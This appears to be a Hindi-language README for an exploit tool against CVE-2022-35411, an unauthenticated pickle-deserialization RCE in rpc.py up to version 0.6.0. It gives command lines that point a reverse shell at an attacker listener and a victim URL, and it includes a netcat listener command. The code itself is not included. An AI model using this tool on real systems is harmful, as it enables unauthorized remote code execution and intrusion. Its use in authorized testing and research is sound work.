
CVE-2022-35411 के लिए शोषण — rpc.py में अप्रमाणित RCE (<= 0.6.0)
यह CVE-2022-35411 के लिए एक अद्यतन और बेहतर शोषण है, जो rpc.py के असुरक्षित संस्करणों (<= 0.6.0) को लक्षित करता है।
यह Python pickle डिसीरियलाइज़ेशन के माध्यम से अप्रमाणित दूरस्थ कोड निष्पादन (RCE) की अनुमति देता है।
मूल शोषण: Elias Hohl
उन्नत: x7331 द्वारा उपयोगिता, पोर्टेबिलिटी और स्वचालन के लिए
कमजोरी rpc.py के Python के pickle मॉड्यूल के असुरक्षित उपयोग में निहित है, जो तैयार किए गए पेलोड को बिना प्रमाणीकरण के मनमाने आदेश निष्पादित करने की अनुमति देती है।
v0.4.2 – v0.6.0argparse पर स्विच किया गया जिसमें --lhost, --lport, --target, और --dry-run फ्लैग हैं-h / --help के माध्यम से उचित उपयोग मार्गदर्शनpython3 rpc-rce.py --lhost 10.10.14.1 --lport 9001
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi
3.xrequests लाइब्रेरी (pip install requests से इंस्टॉल करें)nc -lvnp 9001)यह शोषण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसे उन सिस्टमों पर उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।